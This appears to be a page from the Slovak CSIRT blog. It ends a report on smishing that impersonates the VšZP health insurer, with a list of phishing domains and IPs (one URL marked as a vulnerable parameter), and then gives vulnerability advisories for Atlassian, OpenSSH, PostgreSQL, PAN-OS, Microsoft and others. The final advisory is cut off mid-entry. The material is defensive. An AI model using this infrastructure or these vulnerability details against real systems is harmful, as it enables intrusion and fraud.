Ďalšia podvodná stránka hXXps://obnovypoistenca[.]com, ktorá zneužívala identitu VšZP, bola hosťovaná na IP adrese 62.4.16.155. Táto adresa patrí francúzskej hostingovej spoločnosti SCALEWAY S.A.S. Na danej IP adrese je hostovaných viacero domén, ktoré služba VirusTotal označila ako podozrivé. Konkrétne od 28.02.2025 sa na IP adrese 62.4.16.155 nachádzalo viacero phishingových domén zameraných na finančné inštitúcie.

Obrázok 7 Podozrivé webové stránky na IP adrese 62.4.16.155 (Zdroj: VirusTotal)

Phishingové súpravy ako základ podvodných webov

Spomenuté podvodné webové stránky neboli vytvorené unikátne pre každú kampaň, ale využívali phishingové súpravy (phishing kits), ktoré útočníkom umožnili rýchlo a jednoducho vytvárať podvodné stránky napodobňujúce webové služby legitímnych organizácií. Takéto súpravy obsahujú hotové šablóny, skripty na kradnutie údajov a mechanizmy na obchádzanie bezpečnostných kontrol.

Jednou z aktivít Smishingovej triády je aj vývoj a predaj phishingových kitov. Spoločnosť Resecurity dokázala získať jednu z týchto phishingových súprav a vykonať jej reverzné inžinierstvo. Výsledky analýzy odhalili viacero čínskych jazykových stôp, vrátane prezývky účtu na Telegrame “wangduoyu8”. Dotyčný aktér bol už v minulosti známy svojimi aktivitami v oblasti kybernetických podvodov a predaja phishingových nástrojov. Táto osoba prevádzkuje skupinu na platforme Telegram – “dy_tongbu”, ktorá vznikla 23. februára 2023 a má vyše 2 700 členov. V skupine sú podrobné návody a ukážky phishingových/smishingových súprav so zameraním najmä na organizácie poskytujúce finančné služby, ako sú Mastercard, Visa a PayPal.

Obrázok 8 Screenshot ponuky phishingovej súpravy na sociálnej sieti Telegram (Zdroj: resecurity.com)

Obrázok 9 Screenshot ponuky phishingovej súpravy na platforme Telegram (Zdroj: resecurity.com)

Záver

Smishingové útoky, ako ukazuje prípad zneužívania identity Všeobecnej zdravotnej poisťovne, sa stávajú čoraz sofistikovanejšími a nebezpečnejšími pre jednotlivcov ale aj organizácie. Útočníci kombinujú moderné techniky sociálneho inžinierstva, phishingových webov a falošných platobných brán, čím sú schopní získať citlivé údaje a vykonávať nezákonné transakcie cez mobilné platobné aplikácie. Rovnako sa čoraz častejšie využívajú nové techniky, ako je Ghost Tap, na vzdialený prenos signálu NFC pre realizáciu platieb, čo ešte viac sťažuje identifikáciu a prevenciu týchto útokov.

Dôležité je, aby organizácie a jednotlivci pravidelne prehodnocovali svoje bezpečnostné opatrenia a vzdelávali sa v oblasti rozpoznávania podvodných aktivít. Na začiatok si môžete vyskúšať cvičenie na rozpoznanie phishingových správ, ktoré sme pre Vás pripravili.

IoC (Indikátory kompromitácie):

wangduoyu[.]me
wangduoyu[.]shop
wangduoyu[.]site
poczta-polska[.]cc
ususmx[.]top
ususnb[.]top
ususgs[.]top
ususcgh[.]top
uspoddp[.]top
uspsjh[.]top
ususnu[.]top
usushk[.]top
ususcsa[.]top
uspoky[.]top
usplve[.]top
ususcac[.]top
uspshhg[.]top
uspodad[.]top
uspogumb[.]top
uspsuiu[.]top
uspshhg[.]top
uspsuiu[.]top
uspskkq[.]top
ususuua[.]top
uspodaa[.]top
uspoadc[.]top
uspshhg[.]top
usplve[.]top
usushk[.]top
uspshhg[.]top
ususcgh[.]top
ususnu[.]top
ususnb[.]top
uspoddp[.]top
ususuua[.]top
https://uspsdg[.]top/php/app/index/check-status.php?t=169327492485 (vulnerable parameter)
https://obnovy-poistenca[.]com
15.197.130.221
https://informacie-poistenca[.]com
91.202.233.186
https://mpvsr[.]buzz/
104.21.48.1
104.21.16.1
104.21.32.1
104.21.80.1
104.21.96.1
104.21.64.1
104.21.112.1
2606:4700:3030::6815:7001
2606:4700:3030::6815:2001
2606:4700:3030::6815:4001
2606:4700:3030::6815:3001
2606:4700:3030::6815:5001
2606:4700:3030::6815:1001
2606:4700:3030::6815:6001
https://abre.ai/l4FS
167.71.108.29
http://obnovit-poistenca[.]com/
45.139.104.81
https://obnovit-poistenie[.]com/
https://poistenie-sk[.]com/app
https://wordpress-sk-zseobecna-marinakhawla3638033[.]codeanyapp[.]com/sk/sksiha/
wordpress-sk-zseobecna-marinakhawla3638033[.]codeanyapp[.]com
198.199.109.95
https://overovacl-prostredie[.]com
172.67.208.25
104.21.37.121
2606:4700:3033::ac43:d019
2606:4700:3031::6815:2579
https://kontakt-vszp[.]com
obnovy-365bank[.]com
mojpostova[.]com
renewai-rs-pretplata[.]com

Zdroje:

Mesačná správa CSIRT.SK – január 2025

Marian Danko — Tue, 25 Feb 2025 16:12:19 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 01/2025 PDF (1 395 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Atlassian opravuje kritické zraniteľnosti viacerých produktov

Marian Danko — Fri, 21 Feb 2025 14:14:33 +0000

Spoločnosť Atlassian vydala bezpečnostné aktualizácie na svoje produkty Confluence, Bamboo, Bitbucket, Crowd a Jira, ktoré opravujú 7 zraniteľností, z čoho 3 sú označené ako kritické. Kritické zraniteľnosti v Confluence a Crowd je možné zneužiť na vzdialené vykonanie kódu a obídenie mechanizmov autentifikácie. Ostatné zraniteľnosti je možné zneužiť na zneprístupnenie služby.

Zraniteľné systémy:

Bamboo Data Center a Server – verzie 9.1.2 až 9.1.3, 9.2.3 až 9.2.20 (LTS), 9.3.0 až 9.3.6, 9.4.0 až 9.4.4, 9.5.0 až 9.5.4, 9.6.0 až 9.6.9 (LTS), 10.0.0 až 10.0.3, 10.1.0 až 10.1.1, 10.2.0 (LTS)
Bitbucket Data Center a Server – verzie 8.6.4, 8.7.3 až 8.7.5, 8.8.2 až 8.8.7, 8.9.0 až 8.9.20 (LTS), 8.10.0 až 8.10.6, 8.11.0 až 8.11.6, 8.12.0 až 8.12.6, 8.13.0 až 8.13.6, 8.14.0 až 8.14.6, 8.15.0 až 8.15.5, 8.16.0 až 8.16.4, 8.17.0 až 8.17.2, 8.18.0 až 8.18.1, 8.19.0 až 8.19.10 (LTS), 9.0.0 až 9.0.1, 9.1.0 až 9.1.1, 9.2.0 až 9.2.1
Confluence Data Center a Server – verzie 7.19.6 až 7.19.30 (LTS), 8.1.1 až 8.1.4, 8.2.0 až 8.2.3, 8.3.0 až 8.3.4, 8.4.0 až 8.4.5, 8.5.0 až 8.5.18 (LTS), 8.6.0 až 8.6.2, 8.7.1 až 8.7.2, 8.8.0 až 8.8.1, 8.9.0 až 8.9.8, 9.0.1 až 9.0.3, 9.1.0 až 9.1.1, 9.2.0 (LTS)
Crowd Data Center a Server – verzie 5.3.0 až 5.3.6, 6.0.1 až 6.0.6, 6.1.0 až 6.1.3, 6.2.0
Jira Data Center a Server – verzie 9.4.4 až 9.4.27 (LTS), 9.7.0 až 9.7.2, 9.8.0 až 9.8.2, 9.9.0 až 9.9.2, 9.10.0 až 9.10.2, 9.11.0 až 9.11.3, 9.12.0 až 9.12.14 (LTS), 9.13.0 až 9.13.1, 9.14.0 až 9.14.1, 9.15.2, 9.16.1, 9.17.0 až 9.17.3, 10.0.0 až 10.0.1, 10.1.1

Opis činnosti:

Bamboo Data Center a Server

CVE-2024-7254 (CVSS skóre 8,7)

Pokiaľ projekt parsuje údaje z nedôveryhodných Protocol Buffers, môže dôjsť ku pretečeniu zásobníka pri niektorých atribútoch (groups, tags). Chyba sa nachádza v parseroch DiscardUnknownFieldsParser, Java Protobuf Lite a Protobuf. Úspešným zneužitím môže útočník spôsobiť nedostupnosť služby. Zraniteľnosť súvisí s komponentom com.google.protobuf:protobuf-java.

CVE-2024-47072 (CVSS skóre 7,5)

Ak nástroj XStream na serializáciu a deserializáciu objektov do a z XML používa BinaryStreamDriver, útočník môže podvrhnúť vstupný prúd dát, ktorý spôsobí pretečenie zásobníka a vyvolá nedostupnosť služby. Zraniteľnosť súvisí s komponentom com.thoughtworks.xstream:xstream.

Bitbucket Data Center a Server

CVE-2024-47561 (CVSS skóre 7,3)

Zraniteľnosť v komponente org.apache.avro:avro umožňuje neautentifikovanému útočníkovi pri parsovaní schém v Java SDK pre Apache Avro vzdialene vykonávať kód.

Confluence Data Center a Server

CVE-2024-50379 (CVSS skóre 9,8)

Kritická zraniteľnosť sa nachádza v komponente org.apache.tomcat:tomcat-catalina a súvisí s súbehom typu TOCTOU pri kompilácii JSP v Apache Tomcat. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu na case-insensitive súborových systémoch s povoleným zápisom pre štandardný servlet. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

CVE-2024-56337 (CVSS skóre 9,8)

Kritická zraniteľnosť sa nachádza v komponente org.apache.tomcat:tomcat-catalina a súvisí s súbehom typu TOCTOU v Apache Tomcat. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu na case-insensitive súborových systémoch s povoleným zápisom pre štandardný servlet. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

Crowd Data Center a Server

CVE-2024-52316 (CVSS skóre 9,8)

Kritická zraniteľnosť sa nachádza v komponente org.apache.tomcat:tomcat-catalina a súvisí s neošetrenou chybou autentifikácie, ktorá môže nastať, keď Apache Tomcat používa komponent Jakarta Authentication ServerAuthContext. Vzdialený neautentifikovaný útočník by ju mohol zneužiť obídenie autentifikačného mechanizmu. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

CVE-2022-25927 (CVSS skóre 7,5)

Zraniteľnosť v komponente ua-parser.js umožňuje neautentifikovanému útočníkovi vyvolať nedostupnosť služby.

Crowd Data Center a Server obsahuje aj zraniteľnosti CVE-2024-50337 (CVSS skóre 9,8) a CVE-2024-50379 (CVSS skóre 9,8), popísané vyššie.

Jira Data Center a Server

V Jira Data Center a Server bola opravená zraniteľnosť CVE-2024-7254 (CVSS skóre 8,7), popísaná vyššie.

Možné škody:

Vzdialené vykonávanie kódu
Zneprístupnenie služby (DoS)
Neautorizovaný prístup do systému

Odporúčania:

Bezodkladná aktualizácia aspoň na:

Bamboo Data Center a Server – verzie 9.6.10 (LTS) a 10.2.1 (LTS) [iba DC], alebo 9.2.21 a 9.2.22 [DC aj Server]
Bitbucket Data Center a Server – verzie 8.19.11 až 8.19.15 (LTS), 9.4.3 (LTS) a 9.5.1 [iba DC], alebo 8.9.21 až 8.9.25 (LTS) [DC aj Server]
Confluence Data Center a Server – verzie 9.2.1 (LTS) a 9.3.1 [iba DC], alebo 8.5.19 (LTS) [DC aj Server]
Crowd Data Center a Server – verzie 6.0.7, 6.1.4 a 6.2.2 [iba DC]
Jira Data Center a Server – verzie 9.12.15 (LTS), 9.17.4, 9.17.5 a 10.1.2 [iba DC], alebo 9.4.28 až 9.4.30 (LTS) [DC aj Server]

Odkazy:

Závažné zraniteľnosti OpenSSH

Marian Danko — Thu, 20 Feb 2025 13:39:29 +0000

Vývojári OpenSSH vydali bezpečnostné aktualizácie, ktoré opravujú dve zraniteľnosti umožňujúce realizáciu útokov typu man-in-the-middle a zneprístupnenie služby. Úspešným zneužitím zraniteľností môže útočník získať prístup k citlivým informáciám a prevziať kontrolu nad SSH reláciou.

Zraniteľné systémy:

OpenSSH 6.8p1 až 9.9p1

Opis činnosti:

CVE-2025-26465 (CVSS skóre 6,8)

Zraniteľnosť spočíva v bližšie nešpecifikovanom probléme so spracovaním chybových stavov, ktorú možno na inštanciách s aktivovaným nastavením VerifyHostKeyDNS („yes“ alebo „ask“) zneužiť na útok typu MitM. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa a nezáleží na existencii DNS záznamu SSHFP. Útočník môže impersonovať ľubovoľný server a vložiť do zachytenej komunikácie SSH svoj špeciálne upravený kľúč. Tým môže spôsobiť zahltenie pamäte klienta, obísť overenie hostiteľa a prevziať kontrolu nad reláciou. Môže tak získať prístup k citlivým údajom a možnosť vykonávať príkazy.

CVE-2025-26466 (CVSS skóre 5,9)

Zraniteľnosť spočíva v neobmedzenej alokácii operačnej pamäte, ktorú možno zneužiť na zahltenie dostupných prostriedkov a zneprístupnenie služby. Útočník ju dokáže zneužiť pred autentifikáciou, napríklad zasielaním 16-bajtových paketov SSH2_MSG_PING, na ktoré systém odpovie 256-bajtovými správami, ktoré počas výmeny kľúčov ukladá do pamäte na neobmedzenú dobu.

Možné škody:

Únik citlivých informácií
Nedostupnosť služby (DoS)

Odporúčania:

Bezodkladná aktualizácia OpenSSH aspoň na verziu 9.9p2. Vývojári odporúčajú tiež zakázať VerifyHostKeyDNS, pokiaľ ho nevyhnutne nepotrebujete, a nastaviť limity pripojení (napríklad pomocou funkcií LoginGraceTime, MaxStartups alebo PerSourcePenalties).

Odkazy:

Závažná zraniteľnosť Citrix NetScaler Console a Agent

Marian Danko — Thu, 20 Feb 2025 13:35:54 +0000

Spoločnosť Citrix vydala bezpečnostné aktualizácie pre svoje produkty NetScaler Console a NetScaler Agent, ktoré opravujú vysoko závažnú zraniteľnosť. Táto umožňuje autentifikovanému útočníkovi eskalovať svoje privilégiá a vzdialene vykonávať príkazy.

Zraniteľné systémy:

NetScaler Console a NetScaler Agent 14.1 staršie ako 14.1-38.53
NetScaler Console a NetScaler Agent 13.1 staršie ako 13.1-56.18

Opis činnosti:

CVE-2024-12284 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť CVE-2024-12284 spočíva v nesprávnom manažmente privilégií a autentifikovaný útočník s prístupom ku zraniteľnému systému by ju mohol zneužiť na eskaláciu privilégií a vzdialené vykonanie príkazov.

Riešenia, ktoré manažuje spoločnosť Citrix, boli už zabezpečené. Opravnú aktualizáciu vyžadujú lokálne manažované inštancie NetScaler Console a Agent.

Možné škody:

Eskalácia oprávnení

Odporúčania:

Bezodkladná aktualizácia NetScaler Console a NetScaler Agent aspoň n verziu 13.1-56.18 alebo 14.1-38.53.

Odporúčame tiež nakonfigurovať svoju inštanciu NetScaler Console a NetScaler Agent podľa odporúčaní publikovaných na stránkach výrobcu.

Odkazy:

Kritická zraniteľnosť v distribuovanej databáze Apache Ignite

Marian Danko — Thu, 20 Feb 2025 09:29:01 +0000

Vývojári distribuovanej databázy Apache Ignite vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2024-52577 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Apache Ignite vo verziách 2.6.0 až po 2.17.0

Opis zraniteľnosti:

CVE-2024-52577 (CVSS v4.0 skóre 9,5)

Kritická zraniteľnosť spočíva v nedostatočnej implementácii Class Serialization Filters, ktoré sú na viacerých koncových bodoch Ignite ignorované, čo umožňuje deserializáciu nebezpečných objektov. Zraniteľnosť by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených správ Ignite mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje, aby správy Ignite obsahovali zraniteľný objekt, ktorého trieda je prítomná v tzv. classpath zraniteľného Ignite servera.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných Apache Ignite na verziu 2.17.0 alebo novšiu.

Zdroje:

Aktívne zneužívaná zraniteľnosť v databázovom systéme PostgreSQL

Marian Danko — Mon, 17 Feb 2025 14:45:20 +0000

Vývojári databázového systému PostgreSQL vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť vysokej závažnosti. CVE-2025-1094 vo viacerých funkciách libpq možno zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

PostgreSQL 17.X vo verziách starších ako 17.3
PostgreSQL 16.X vo verziách starších ako 16.7
PostgreSQL 15.X vo verziách starších ako 15.11
PostgreSQL 14.X vo verziách starších ako 14.16
PostgreSQL 13.X vo verziách starších ako 13.19

Opis zraniteľnosti:

CVE-2025-1094 (CVSS skóre 8,1)

CVE-2025-1094 spočívajúcu v nesprávnej neutralizácii syntaxe úvodzoviek vo viacerých funkciách libpq a príkazovom riadku by vzdialený neautentifikovaný útočník prostredníctvom SQL injekcie vedúcej k zneužitiu funkcionality pre spúšťanie metapríkazov mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľnosť je možné zneužiť len pri špecifickej konfigurácii systémov:

výstupy libpq funkcií sú používané ako vstupy do psql (interaktívny terminál PostgreSQL)
súčasné nastavení client_encoding na hodnotu BIG5 a server_encoding na hodnoty EUC_TW alebo MULE_INTERNAL.

Pozn.: Zraniteľnosť je podľa spoločnosti RAPID-7 aktívne zneužívaná minimálne od decembra 2024. Jej zneužitie bolo zaznamenané v súvislosti s útokmi zneužívajúcimi zraniteľnosti v produktoch BeyondTrust PRA (Privileged Remote Access) a BeyondTrust RS (Remote Support).

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie 17.3, 16.7, 15.11, 14.16 alebo 13.19.

Zdroje:

Aktívne zneužívaná zraniteľnosť v operačnom systéme Palo Alto PAN-OS

Marian Danko — Mon, 17 Feb 2025 14:43:53 +0000

Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie pre svoj sieťový operačný systém PAN-OS, ktoré opravujú 4 zraniteľnosti, z ktorých 1 je označená ako aktívne zneužívaná. Zraniteľnosti nachádzajúce sa vo webovom manažmentovom rozhraní a plugine OpenConfig možno zneužiť na injekciu príkazov, získanie neoprávneného prístupu k citlivým údajom a vykonanie neoprávnených zmien v systéme. CVE-2025-0108 je podľa spoločnosti GreyNoise v súčasnosti aktívne zneužívaná útočníkmi.

[Aktualizované 20.02.2025]

Zraniteľné systémy:

PAN-OS 11.2 vo verziách starších ako 11.2.4-h4
PAN-OS 11.1 vo verziách starších ako 11.1.6-h1
PAN-OS 10.2 vo verziách starších ako 10.2.13-h3
PAN-OS 10.1 vo verziách starších ako 10.1.14-h9
PAN-OS OpenConfig Plugin vo verziách starších ako 2.1.2

Pozn.: Cloud NGFW a Prisma Access nie sú zraniteľné.

Opis zraniteľnosti:

CVE-2025-0108 (CVSS skóre 7,8)

Zraniteľnosť s identifikátorom CVE-2025-0108 spočíva v nesúlade spracovania prichádzajúcich požiadaviek v rámci komponentov nginx a Apache. Vzdialený neautentifikovaný útočník s prístupom k webovému manažmentovému rozhraniu by ju mohol zneužiť na obídenie mechanizmov autentifikácie a spustenie vybraných PHP skriptov vedúcich k narušeniu dôvernosti a integrity systému. V prípadoch, keď je prístup k manažmentovému rozhraniu limitovaný len na jump boxy, je zraniteľnosť hodnotená ako stredne závažná.

Pozn.: Na základe informácií od spoločnosti GreyNoise je zraniteľnosť v súčasnosti aktívne zneužívaná.

CVE-2025-0110 (CVSS skóre 7,3)

Injekciu príkazov v plugine OpenConfig by vzdialený autentifikovaný útočník s oprávneniami administrátora zaslaním požiadaviek gNMI na webové manažmentové rozhranie PAN-OS mohol zneužiť na vzdialené spustenie príkazov. Príkazy sú spúšťané v kontexte používateľa „__opencnfig“, ktorý funguje ako správca zariadenia.

Pozn.: Zraniteľnosť je možné zneužiť len na PAN-OS, na ktorých je predmetný plugin aktivovaný.

CVE-2025-0109 (CVSS skóre 5,5)

Zraniteľnosť sa nachádza vo webovom manažmentovom rozhraní a umožňuje mazanie určitých súborov. Zneužitie zraniteľnosti nevyžaduje autentifikáciu a umožňuje útočníkovi so sieťovým prístupom ku zraniteľnému zariadeniu cez používateľa „nobody“ zmazanie niektorých logov a konfiguračných súborov, pričom nie je možné zmazať systémové súbory.

CVE-2025-0111 (CVSS skóre 4,9)

Zraniteľnosť strednej závažnosti by vzdialený autentifikovaný útočník so sieťovým prístupom ku zraniteľnému zariadeniu mohol zneužiť na čítanie obsahu súborov prístupných pre používateľa „nobody“, a teda získanie neoprávneného prístupu k citlivým údajom.

[Aktualizácia 20.2.2025]: Spoločnosť Palo Alto Networks upozornila na aktívne zneužívanie zraniteľnosti CVE-2025-0111. Zraniteľnosť je zneužívaná súčasne so zraniteľnosťami CVE-2025-0108 a CVE-2024-9474 a ich vzájomné zreťazenie umožňuje získanie úplnej kontroly nad zariadeniami (root prístup). Spoločnosť GreyNoise eviduje podstatný nárast pokusov o zneužitie týchto zraniteľností.

Možné škody:

Injekcia príkazov
Neoprávnená zmena v systéme
Neoprávnený prístup k citlivým údajom

Odporúčania:

Spoločnosť Palo Alto odporúča používať len produkty s platnou technickou podporou a bezodkladne aktualizovať zasiahnuté systémy aspoň na verziu:

PAN-OS 11.2.4-h4
PAN-OS 11.1.6-h1
PAN-OS 10.2.13-h3
PAN-OS 10.1.14-h9
PAN-OS OpenConfig Plugin 2.1.2

Výrobca taktiež odporúča obmedziť prístup k webovému rozhraniu len na dôveryhodné IP adresy a dodržiavať postupy best practice pre prevádzku a zabezpečenie PAN-OS, ktoré môžete nájsť online.

Zdroje:

Microsoft v rámci februárového Patch Tuesday opravil 4 kritické zraniteľnosti

Marian Danko — Mon, 17 Feb 2025 14:42:03 +0000

Spoločnosť Microsoft vydala vo februári 2025 balík opráv pre portfólio svojich produktov opravujúci 61 zraniteľností, z ktorých 26 umožňuje vzdialené vykonanie kódu. Kritické zraniteľnosti nachádzajúce sa v produktoch Microsoft Dynamics 365 Sales a Microsoft Excel a komponentoch Windows Lightweight Directory Access Protocol (LDAP) a DHCP Client Service možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu. Zraniteľnosti vo Windows Storage (CVE-2025-21391) a Windows Ancillary Function Driver for WinSock (CVE-2025-21418) sú v súčasnosti aktívne zneužívané útočníkmi.

Zraniteľné systémy:

Azure Network Watcher VM Extension
CBL Mariner 2.0 ARM
CBL Mariner 2.0 x64
Dynamics 365 Sales
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft AutoUpdate for Mac
Microsoft Edge (Chromium-based)
Microsoft Edge for Android
Microsoft Edge for iOS
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft HPC Pack 2016
Microsoft HPC Pack 2019
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft Outlook for Android
Microsoft PC Manager
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Surface Go 2
Microsoft Surface Go 3
Microsoft Surface Hub
Microsoft Surface Hub 2S
Microsoft Surface Hub 3
Microsoft Surface Laptop Go
Microsoft Surface Laptop Go 2
Microsoft Surface Laptop Go 3
Microsoft Surface Pro 7+
Microsoft Surface Pro 8
Microsoft Surface Pro 9 ARM
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.11 (includes 16.0 – 16.10)
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.12
Microsoft Visual Studio 2022 version 17.8
Office Online Server
Surface Laptop 3 with Intel Processor
Surface Laptop 4 with AMD Processor
Surface Laptop 4 with Intel Processor
Surface Windows Dev Kit
Visual Studio Code
Visual Studio Code – JS Debug Extension
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)

Opis činnosti:

Kritické zraniteľnosti:

CVE-2025-21177 (CVSS skóre 8,7)

Bližšie nešpecifikovanú zraniteľnosť v Microsoft Dynamics 365 Sales by vzdialený autentifikovaný útočník prostredníctvom SSRF (Server Side Request Forgery) útokov mohol zneužiť na eskaláciu privilégií. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.

CVE-2025-21376 (CVSS skóre 8,1)

Komponent Windows Lightweight Directory Access Protocol (LDAP) obsahuje kritickú zraniteľnosť, ktorú by vzdialený neautentifikovaný útočník prostredníctvom špeciálne vytvorených LDAP volaní mohol zneužiť na vzdialené vykonanie kódu. Úspešné zneužitie zraniteľností vyžaduje, aby útočník vyhral súbeh procesov.

CVE-2025-21379 (CVSS skóre 7,1)

Použitie odalokovaného miesta v pamäti v rámci komponentu DHCP Client by útočník nachádzajúci sa v rovnakom sieťovom segmente mohol prostredníctvom tzv. machine-in-the-middle útoku zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa.

CVE-2025-21381 (CVSS skóre 7,8)

Kritická zraniteľnosť v Microsoft Excel spočíva v dereferencii nedôveryhodných ukazovateľov a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a otvoriť špeciálne vytvorený súbor.

Aktívne zneužívané zraniteľnosti:

CVE-2025-21391 (CVSS skóre 7,1)

Nesprávny preklad odkazov pred prístupom k súborom v rámci komponentu Windows Storage by lokály autentifikovaný útočník mohol zneužiť na eskaláciu privilégií umožňujúcu zmazanie súborov na súborovom systéme. Zmazanie súborov kritických pre beh systému môže viesť k zneprístupneniu služby.

CVE-2025-21418 (CVSS skóre 7,8)

Pretečenie medzipamäte haldy v rámci Windows Ancillary Function Driver možno lokálne zneužiť na eskaláciu privilégií na úroveň SYSTEM. Zneužitie zraniteľnosti vyžaduje autentifikáciu.

Uvedené zraniteľnosti sú v súčasnosti aktívne zneužívané útočníkmi.

Ostatné významné zraniteľnosti:

CVE-2025-21377 (CVSS skóre 7,8)

Zraniteľnosť v operačnom systéme Windows spočívajúcu v externej kontrole názvu alebo cesty súboru by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených súborov mohol zneužiť na získanie autentifikačných NTLMv2 hashov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí na súbor kliknúť alebo vykonať inú operáciu, ako jeho otvorenie alebo spustenie.

26 vysoko závažných zraniteľností v CBL Mariner a Microsoft Visual Studio 2019 (CVE-2023-32002), Windows Telephony Service (CVE-2025-21190, CVE-2025-21200, CVE-2025-21201, CVE-2025-21371, CVE-2025-21406, CVE-2025-21407), Microsoft High Performance Compute (HPC) Pack (CVE-2025-21198), Windows Routing and Remote Access Service (RRAS) (CVE-2025-21208, CVE-2025-21410), Microsoft Edge (CVE-2025-21279, CVE-2025-21283, CVE-2025-21342, CVE-2025-21408), Microsoft Digest Authentication (CVE-2025-21368, CVE-2025-21369), Microsoft Excel (CVE-2025-21386, CVE-2025-21387, CVE-2025-21390, CVE-2025-21394), Microsoft Office (CVE-2025-21392, CVE-2025-21397) a Microsoft SharePoint Server (CVE-2025-21400) možno zneužiť na vzdialené vykonanie kódu.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Zneprístupnenie služby
Obídenie bezpečnostného prvku
Spoofing

Odporúčania:

Bezodkladné nasadenie februárového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete tu.

Zdroje:

Kritické zraniteľnosti v produktoch Ivanti ICS, IPS, ISAC a CSA

Marian Danko — Mon, 17 Feb 2025 14:40:08 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), Ivanti Secure Access Client (Ivanti Secure Access Client) a Ivanti Cloud Services Application (CSA), ktoré opravujú 10 zraniteľností, z čoho 4 sú označené ako kritické. Kritické zraniteľnosti umožňujú vzdialené vykonanie kódu, získanie neoprávneného prístupu k citlivým údajom a vykonanie neoprávnených zmien v systéme.

Zraniteľné systémy:

Ivanti Connect Secure vo verziách starších ako 22.7R2.6
Ivanti Policy Secure vo verziách starších ako 22.7R1.3
Ivanti Secure Access Client vo verziách starších ako 22.8R1
Ivanti Cloud Services Application vo verziách starších ako 5.0.5

Opis zraniteľnosti:

Ivanti Connect Secure, Ivanti Policy Secure:

CVE-2024-38657 (CVSS skóre 9,1)

